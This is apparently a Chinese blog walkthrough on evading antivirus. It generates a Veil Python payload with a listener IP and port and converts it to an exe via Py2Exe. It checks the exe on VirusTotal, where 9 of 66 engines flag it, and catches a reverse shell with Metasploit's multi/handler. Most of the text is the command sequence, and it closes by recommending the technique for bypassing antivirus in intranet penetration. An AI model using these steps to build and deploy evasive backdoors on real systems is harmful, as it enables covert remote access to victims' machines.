生成Python文件
运行Veil1
2
3
4./Veil.py
use 1
list //查看payloads
use 28 //选择payloads
1
2
3
4set LHOST 192.168.*.* //设置IP地址
set LPORT 11550 //设置端口
options //看payloads的设置
generate //生成payloads
选择第2,使用Py2Exe生成
看到生成的文件有30.py runme.bat setup.py
生成exe文件
先在win7虚拟机中安装了Python2.7、 py2Exe、 PyCrypto、 PyWin32,都是32位的。然后将python脚本变为可执行文件。
复制到win7,运行runme.bat,生成exe文件。
Virustotal
Virustotal在线检测,66个引擎只有9个发现后门。
运行msfconsole
1 | use exploit/multi/handler |
运行30.exe
接收到反弹的shell
总结
整体来说这次免杀还是不错的,平时在内网渗透可以用这个免杀技术过大部分杀毒软件,但杀毒软件的更新是非常快的,免杀技术需要不断地磨练与实践,才能在实战中提高成功率。